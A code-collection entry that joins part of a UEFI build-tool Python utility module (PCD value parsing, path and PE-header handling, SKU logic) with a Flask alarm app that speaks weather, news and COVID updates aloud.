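#   ParseFieldValue('UINT16(0x1234)')   # -> (0x1234, 2)
#   ParseFieldValue('"AB"')             # -> (0x4241, 3)   ASCII string plus NUL terminator
#   ParseFieldValue('TRUE')             # -> (1, 1)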
## AnalyzeDscPcd
#
# Analyze DSC PCD value, since there is no data type info in DSC
# This function is used to match functions (AnalyzePcdData) used for retrieving PCD value from database
# 1. Feature flag: TokenSpace.PcdCName|PcdValue
# 2. Fix and Patch:TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# 3. Dynamic default:
# TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
# TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
# TokenSpace.PcdCName|VpdOffset[|VpdValue]
# TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
# TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
# PCD value needs to be located in such kind of string, and the PCD value might be an expression in which
# there might be a "|" operator, also inside string values.
#
# @param Setting: String contain information described above with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default, dynamic VPD, dynamic HII
# @param DataType: The datum type of PCD: VOID*, UINT, BOOL
# @retval:
# ValueList: A List contain fields described above
# IsValid: True if conforming EBNF, otherwise False
# Index: The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
FieldList = AnalyzePcdExpression(Setting)
IsValid = True
if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1 and FieldList[1]:
DataType = FieldList[1]
if FieldList[1] != TAB_VOID and StructPattern.match(FieldList[1]) is None:
IsValid = False
if len(FieldList) > 2:
Size = FieldList[2]
if IsValid:
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [str(Value), DataType, str(Size)], IsValid, 0
elif PcdType == MODEL_PCD_FEATURE_FLAG:
Value = FieldList[0]
Size = ''
IsValid = (len(FieldList) <= 1)
return [Value, DataType, str(Size)], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == TAB_VOID:
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [VpdOffset, str(Size), Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
IsValid = (3 <= len(FieldList) <= 5)
HiiString = FieldList[0]
Guid = Offset = Value = Attribute = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
if len(FieldList) > 4:
Attribute = FieldList[4]
return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
return [], False, 0
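# Illustrative sketch (not part of the original source), assuming the MODEL_PCD_*
# constants and StructPattern come from their usual definitions elsewhere in the
# tool: a fixed-at-build PCD value with an explicit type and size splits into its
# three fields.
#
#   AnalyzeDscPcd("0x1|UINT8|1", MODEL_PCD_FIXED_AT_BUILD)
#   # -> (['0x1', 'UINT8', '1'], True, 0)   value list, IsValid, index of the value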
## AnalyzePcdData
#
# Analyze the pcd Value, Datum type and TokenNumber.
# Used to avoid split issues while the value string contains a "|" character
#
# @param[in] Setting: A String contain value/datum type/token number information;
#
# @retval ValueList: A List containing value, datum type and token number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
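# Illustrative sketch (not part of the original source), assuming TAB_VALUE_SPLIT
# is "|": a quoted value that itself contains "|" is kept intact instead of being
# split.
#
#   AnalyzePcdData('L"A|B"|VOID*|10')
#   # -> ['L"A|B"', 'VOID*', '10']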
## Check the format of a PCD value against its datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
if Type == TAB_VOID:
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
or (Value.startswith('{') and Value.endswith('}')) or ((Value.startswith("L'") or Value.startswith("'")) and Value.endswith("'"))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", \"...\" or \'...\' for string, L\"...\" or L\'...\' for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = sorted(Printset)
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
try:
if Value and int(Value, 0) < 0:
return False, "PCD can't be set to negative value[%s] for datum type [%s]" % (Value, Type)
Value = int(Value, 0)
if Value > MAX_VAL_TYPE[Type]:
return False, "Too large PCD value[%s] for datum type [%s]" % (Value, Type)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return True, "StructurePcd"
return True, ""
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in range(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
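# Illustrative sketch (not part of the original source); with a POSIX-style path
# separator, the longest common prefix of the path components is returned.
#
#   CommonPath(['/ws/Pkg/Driver/A.inf', '/ws/Pkg/Library/B.inf'])
#   # -> '/ws/Pkg'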
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Root = mws.getWs(self.Root, self.File)
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root) + 1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
self.OriginalPath = self
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
return self.Path == str(Other)
## Override __cmp__ function
#
# Customize the comparison operation of two PathClass
#
# @retval 0 The two PathClass are the same
# @retval -1 The first PathClass is less than the second PathClass
# @retval 1 The first PathClass is greater than the second PathClass
def __cmp__(self, Other):
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
@cached_property
def Key(self):
return self.Path.upper()
@property
def TimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir) + 1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir) + 1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
if len (mws.getPkgPath()) == 0:
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
else:
return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
## Parse PE image to get the required PE information.
#
class PeImageClass():
## Constructor
#
# @param File FilePath of PeImage
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
if ByteArray.tostring() != b'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
class DefaultStore():
def __init__(self, DefaultStores ):
self.DefaultStores = DefaultStores
def DefaultStoreID(self, DefaultStoreName):
for key, value in self.DefaultStores.items():
if value == DefaultStoreName:
return key
return None
def GetDefaultDefault(self):
if not self.DefaultStores or "0" in self.DefaultStores:
return "0", TAB_DEFAULT_STORES_DEFAULT
else:
minvalue = min(int(value_str) for value_str in self.DefaultStores)
return (str(minvalue), self.DefaultStores[str(minvalue)])
def GetMin(self, DefaultSIdList):
if not DefaultSIdList:
return TAB_DEFAULT_STORES_DEFAULT
storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
if not storeidset:
return ""
minid = min(storeidset )
for sid, name in self.DefaultStores.values():
if sid == minid:
return name
class SkuClass():
DEFAULT = 0
SINGLE = 1
MULTIPLE =2
def __init__(self,SkuIdentifier='', SkuIds=None):
if SkuIds is None:
SkuIds = {}
for SkuName in SkuIds:
SkuId = SkuIds[SkuName][0]
skuid_num = int(SkuId, 16) if SkuId.upper().startswith("0X") else int(SkuId)
if skuid_num > 0xFFFFFFFFFFFFFFFF:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
% (SkuName, SkuId))
self.AvailableSkuIds = OrderedDict()
self.SkuIdSet = []
self.SkuIdNumberSet = []
self.SkuData = SkuIds
self._SkuInherit = {}
self._SkuIdentifier = SkuIdentifier
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
self.SkuIdNumberSet = ['0U']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = list(SkuIds.keys())
self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
k = None
try:
self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
except Exception:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (k, " | ".join(SkuIds.keys())))
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each][0]
else:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " | ".join(SkuIds.keys())))
if self.SkuUsageType != SkuClass.SINGLE:
self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
if self.SkuIdSet:
GlobalData.gSkuids = (self.SkuIdSet)
if 'COMMON' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('COMMON')
if self.SkuUsageType == self.SINGLE:
if len(GlobalData.gSkuids) != 1:
if 'DEFAULT' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('DEFAULT')
if GlobalData.gSkuids:
GlobalData.gSkuids.sort()
def GetNextSkuId(self, skuname):
if not self._SkuInherit:
self._SkuInherit = {}
for item in self.SkuData.values():
self._SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
return self._SkuInherit.get(skuname, "DEFAULT")
def GetSkuChain(self, sku):
if sku == "DEFAULT":
return ["DEFAULT"]
skulist = [sku]
nextsku = sku
while True:
nextsku = self.GetNextSkuId(nextsku)
skulist.append(nextsku)
if nextsku == "DEFAULT":
break
skulist.reverse()
return skulist
def SkuOverrideOrder(self):
skuorderset = []
for skuname in self.SkuIdSet:
skuorderset.append(self.GetSkuChain(skuname))
skuorder = []
for index in range(max(len(item) for item in skuorderset)):
for subset in skuorderset:
if index > len(subset)-1:
continue
if subset[index] in skuorder:
continue
skuorder.append(subset[index])
return skuorder
@property
def SkuUsageType(self):
if self._SkuIdentifier.upper() == "ALL":
return SkuClass.MULTIPLE
if len(self.SkuIdSet) == 1:
if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
return SkuClass.SINGLE
if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet:
return SkuClass.SINGLE
return SkuClass.MULTIPLE
def DumpSkuIdArrary(self):
if self.SkuUsageType == SkuClass.SINGLE:
return "{0x0}"
ArrayStrList = []
for skuname in self.AvailableSkuIds:
if skuname == "COMMON":
continue
while skuname != "DEFAULT":
ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
skuname = self.GetNextSkuId(skuname)
ArrayStrList.append("0x0")
return "{{{myList}}}".format(myList=",".join(ArrayStrList))
@property
def AvailableSkuIdSet(self):
return self.AvailableSkuIds
@property
def SystemSkuId(self):
if self.SkuUsageType == SkuClass.SINGLE:
if len(self.SkuIdSet) == 1:
return self.SkuIdSet[0]
else:
return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
else:
return 'DEFAULT'
## Get the integer value from a string like "14U" or an integer like 2
#
# @param Input The object that may be either an integer value or a string
#
# @retval Value The integer value that the input represents
#
def GetIntegerValue(Input):
if not isinstance(Input, str):
return Input
String = Input
if String.endswith("U"):
String = String[:-1]
if String.endswith("ULL"):
String = String[:-3]
if String.endswith("LL"):
String = String[:-2]
if String.startswith("0x") or String.startswith("0X"):
return int(String, 16)
elif String == '':
return 0
else:
return int(String)
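# Illustrative examples (not part of the original source) of the suffix handling:
#
#   GetIntegerValue("14U")    # -> 14
#   GetIntegerValue("0x10")   # -> 16
#   GetIntegerValue(2)        # -> 2 (non-strings are returned unchanged)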
#
# Pack a GUID (registry format) list into a buffer and return it
#
def PackGUID(Guid):
return pack(PACK_PATTERN_GUID,
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16)
)
#
# Pack a GUID (byte) list into a buffer and return it
#
def PackByteFormatGUID(Guid):
return pack(PACK_PATTERN_GUID,
Guid[0],
Guid[1],
Guid[2],
Guid[3],
Guid[4],
Guid[5],
Guid[6],
Guid[7],
Guid[8],
Guid[9],
Guid[10],
)
## Deep copy a dict/OrderedDict recursively
#
# @param ori_dict a nested dict or ordereddict
#
# @retval new dict or OrderedDict
#
def CopyDict(ori_dict):
dict_type = ori_dict.__class__
if dict_type not in (dict,OrderedDict):
return ori_dict
new_dict = dict_type()
for key in ori_dict:
if isinstance(ori_dict[key],(dict,OrderedDict)):
new_dict[key] = CopyDict(ori_dict[key])
else:
new_dict[key] = ori_dict[key]
return new_dict
#
# Remove the c/c++ comments: // and /* */
#
def RemoveCComments(ctext):
return re.sub('//.*?\n|/\*.*?\*/', '\n', ctext, flags=re.S)
|
main.py
|
'''
This is the main alarms file
'''
# pylint: disable=line-too-long, unsubscriptable-object, global-statement, bare-except
import time
import json
import random
import sched
import threading
import logging
from datetime import datetime
import pyttsx3
from flask import Flask, request, render_template
from news_filter import get_news, get_news_from_api
from weather_update import get_weather, get_weather_from_api
from covid_update import get_covid
notifications = [] # an array for current notifications
old_notifications = [] # an array for removed notifications
alarms = [] # an array for the alarms
config = json.load(open('config.json')) # open the config file and load it as a dictionary
weather_api_key = config['weather_api_key'] # extract the weather api key
news_api_key = config['news_api_key'] # extract the news api key
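# Sketch of the expected config.json shape (an assumption inferred from the keys
# read in this file; the example values are hypothetical and the real file is not
# part of this listing):
#
#   {
#       "title": "Daily Briefing",
#       "city": "Exeter",
#       "weather_api_key": "<openweathermap key>",
#       "news_api_key": "<newsapi key>",
#       "covid_infected_threshold": 10000,
#       "covid_death_threshold": 100
#   }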
s = sched.scheduler(time.time, time.sleep) # initialise the scheduler
logging.basicConfig(filename='sys.log', level=logging.INFO) # initialise the logging module
app = Flask(__name__) # initialise the flask app
app.logger.disabled = True # disable console logging for flask
logging.getLogger('werkzeug').disabled = True # disable logging for flask in the log file
logging.getLogger('comtypes.client._code_cache').disabled = True # disable other kind of logging
try:
CURRENT_WEATHER = get_weather(get_weather_from_api(weather_api_key, config['city']).json()) # get the weather for current city
except:
logging.error('%s:An error occurred with the weather API', datetime.now())
def trigger_alarm(data: dict) -> None:
'''
This function is used to trigger an alarm, it is only called on
when an alarm is meant to go off
keyword argument:
data -- the alarm information such as content, title etc.
'''
logging.info('Alarm called %s is going off at %s', data['title'], datetime.now())
engine = pyttsx3.init() # initialise the tts engine
engine.say('Your alarm called %s is going off' % data['title']) # announce that the alarm is going off
if data['weather']: # if the weather is enabled
try:
engine.say('''
The current temperature is {0} degrees celsius.
The level of humidity is {1} percent.
And lastly, the weather is described as {2}
'''.format(CURRENT_WEATHER['temperature'], CURRENT_WEATHER['humidity'], CURRENT_WEATHER['description'])) # announce the weather
except:
logging.error('%s:An error occurred with the weather API', datetime.now())
if data['news']: # if the news is enabled
try:
three_articles = random.sample(get_news(get_news_from_api(news_api_key).json()), 3)
news_content = set([a['title'] for a in three_articles])
engine.say('Here are some top news articles: {0}'.format('. '.join(news_content))) # announce 3 random news articles
except:
logging.error('%s:An error occurred with the news API', datetime.now())
try:
covid = get_covid() # get the covid data for england
cases = covid['newCasesByPublishDate'] # get cases today
deaths = covid['newDeaths28DaysByPublishDate'] # get deaths today for people who tested positive in the last 28 days
cum_cases = covid['cumCasesByPublishDate'] # get total cases
cum_deaths = covid['cumDeaths28DaysByPublishDate'] # get total deaths for people who tested positive in the last 28 days
engine.say('''
In regards to COVID-19, there have been {0} cases and {1} deaths today.
In total, there have been {2} cases and {3} deaths.
'''.format(cases, deaths, cum_cases, cum_deaths)) # announce the covid data
except:
logging.error('%s:An error occurred with the covid API', datetime.now())
engine.runAndWait()
del data['alarm_object'] # delete the scheduler event from the dictionary
alarms.remove(data) # delete the alarm from the alarms list
@app.route('/index')
def index() -> None:
'''
This function runs whenever a user goes to /index
'''
try:
update_notifications() # update the notifications
except:
logging.error('%s:An error occurred with updating the notifications', datetime.now())
notif = request.args.get('notif') # parse the url
alarm_item = request.args.get('alarm_item')
alarm = request.args.get('alarm')
news = bool(request.args.get('news'))
weather = bool(request.args.get('weather'))
if notif: # if they're removing a notification
for notification in notifications: # for each notification in the list of notifications
if notification['title'] == notif: # if the notification matches the notification being removed
notifications.remove(notification) # remove the notification from the list of notifications
old_notifications.insert(0, notification) # add the notification to the list of old notifications
logging.info('%s:"%s" was removed from the list of notifications', datetime.now(), notification['title'])
if alarm_item: # if they're removing an alarm
for alarm_ in alarms: # for each alarm in the list of alarms
if alarm_['title'] == alarm_item: # if the alarm matches the alarm being removed
alarms.remove(alarm_) # remove the alarm from the list of alarms
s.cancel(alarm_['alarm_object']) # cancel the alarm in the scheduler
try:
data = json.load(open('alarms.json')) # load the alarms.json file into a dictionary
del alarm_['alarm_object'] # delete the scheduler event from the dictionary
data.remove(alarm_) # remove the alarm from the alarms.json file
alarms_file = open('alarms.json', 'w') # open the alarms.json file with the ability to edit it
alarms_file.write(json.dumps(data, indent=4)) # save the new list of alarms to alarms.json
except json.decoder.JSONDecodeError:
logging.error('%s:There was an issue updating the alarms.json file', datetime.now())
logging.info('%s:"%s" was removed from the list of alarms', datetime.now(), alarm_['title'])
try:
if alarm: # if they're setting an alarm
alarm_date = datetime.strptime(alarm, '%Y-%m-%dT%H:%M').timestamp() # convert the date and time to a timestamp
current_date = datetime.now().timestamp() # get the current timestamp
if alarm_date - current_date > 0: # if the alarm is set in the future
content = 'The alarm is set to go off at {0}.'
if news: # if the news is going to be announced
content += ' The news will be announced.'
if weather: # if the weather is going to be announced
content += ' The weather will be announced.'
content = content.format(alarm.replace('T', ' '))
alarm_data = { # save the alarm data as a dictionary
'alarm': alarm,
'title': request.args.get('two'),
'news': news,
'weather': weather,
'content': content
}
try:
data = json.load(open('alarms.json')) # load the alarms.json file into a dictionary
data.append(alarm_data) # add the alarm to the alarms.json file
alarms_file = open('alarms.json', 'w') # open the alarms.json file with the ability to edit it
alarms_file.write(json.dumps(data, indent=4)) # save the new list of alarms to alarms.json
except json.decoder.JSONDecodeError:
logging.error('%s:There was an issue uploading the alarm to the alarms.json file', datetime.now())
alarm_object = s.enter(alarm_date - current_date, 1, trigger_alarm, (alarm_data, )) # schedule the alarm
threading.Thread(target=s.run).start() # create a new thread and run the scheduler and start the thread
alarm_data['alarm_object'] = alarm_object # append the schedule event to the alarm dictionary
alarms.append(alarm_data) # add the alarm to the list of alarms
logging.info('%s:An alarm called "%s" has been set for %s', datetime.now(), alarm_data['title'], datetime.fromtimestamp(alarm_date))
else:
logging.warning('%s:An alarm called "%s" was set for the past, it has been cancelled', datetime.now(), request.args.get('two'))
except ValueError:
logging.error('%s:The user entered an invalid date', datetime.now())
title = config['title'] # get the title for the alarm
return render_template('index.html', title=title, notifications=notifications, alarms=alarms, image='image.png') # render the page
def update_notifications() -> None:
'''
This function is used to update notifications with information
from the news, weather and covid api
'''
try:
for article in get_news(get_news_from_api(news_api_key).json()): # for each article in the articles from the api
if article not in notifications and article not in old_notifications: # if the notification isn't in current notifications and not in old notifications
notifications.insert(0, {
'title': article['title'],
'content': article['content']
}) # insert the notification in the list of notifications
logging.info('%s:"%s" was added to the list of notifications', datetime.now(), article['title'])
except Exception: # keep running even if the news API call fails
logging.error('%s:An error occurred with the news API', datetime.now())
try:
new_weather = get_weather(get_weather_from_api(weather_api_key, config['city']).json()) # get the weather for the current city
global CURRENT_WEATHER # set the variable as a global variable
if new_weather != CURRENT_WEATHER: # if the weather has changed
content = ''
if new_weather['temperature'] != CURRENT_WEATHER['temperature']: # if the temperature changed
content += ' The temperature has changed from {0}°C to {1}°C.'.format(
str(CURRENT_WEATHER['temperature']), str(new_weather['temperature'])
)
if new_weather['humidity'] != CURRENT_WEATHER['humidity']: # if the humidity changed
content += ' The level of humidity has changed from {0}% to {1}%.'.format(
CURRENT_WEATHER['humidity'], new_weather['humidity']
)
if new_weather['description'] != CURRENT_WEATHER['description']: # if the description changed
content += ' The description of the weather has changed from {0} to {1}.'.format(
CURRENT_WEATHER['description'], new_weather['description']
)
notifications.insert(0, {
'title': 'Weather Update - {0}'.format(datetime.now().strftime('%d/%m/%Y %H:%M:%S')),
'content': content
}) # insert the weather update to the notifications
CURRENT_WEATHER = new_weather # update the current weather variable
logging.info('%s:"%s" was added to the list of notifications', datetime.now(), notifications[0]['title'])
except Exception: # keep running even if the weather API call fails
logging.error('%s:An error occurred with the weather API', datetime.now())
try:
covid = get_covid() # get the covid data for england
cases = covid['newCasesByPublishDate'] # get cases today
deaths = covid['newDeaths28DaysByPublishDate'] # get deaths today for people who tested positive in the last 28 days
cases_threshold = config['covid_infected_threshold'] # get the covid infected threshold from the config file
deaths_threshold = config['covid_death_threshold'] # get the covid death threshold from the config file
deaths = deaths if deaths else 0 # if deaths is None, set it as 0
if cases >= cases_threshold or deaths >= deaths_threshold: # if the cases or deaths is higher than the thresholds
covid_content = 'There are currently {0} new cases and {1} new deaths today'.format(cases, deaths)
covid_notif = {
'title': 'COVID Update',
'content': covid_content
}
if (covid_notif not in notifications) and (covid_notif not in old_notifications): # if the notification is new
notifications.insert(0, covid_notif) # insert the covid update to the notifications
logging.info('%s:"%s" was added to the list of notifications', datetime.now(), covid_notif['title'])
except Exception: # keep running even if the covid API call fails
logging.error('%s:An error occurred with the covid API', datetime.now())
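# For reference, every entry handled by update_notifications() is a plain dictionary with
# 'title' and 'content' keys, inserted at index 0 so the newest item is shown first.
# A hypothetical example of what ends up in the notifications list:
#   {'title': 'Weather Update - 01/01/2021 09:00:00',
#    'content': ' The temperature has changed from 3°C to 5°C.'}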
def check_alarms() -> None:
'''
This function is used to retrieve any alarms that will go off
in the future in the case that the program restarts/crashes
'''
try:
alarms_file = open('alarms.json') # open the alarms.json file
data = json.load(alarms_file) # load the saved alarms into a list of dictionaries
alarms_file.close() # close the file once the alarms have been read
for alarm in data: # for each alarm in the alarms file
alarm_date = datetime.strptime(alarm['alarm'], '%Y-%m-%dT%H:%M').timestamp() # get the date/time the alarm is meant to go off
current_date = datetime.now().timestamp() # get the current date as a timestamp
delay = alarm_date - current_date # get the delay
if delay > 0: # if the alarm is going to go off in the future
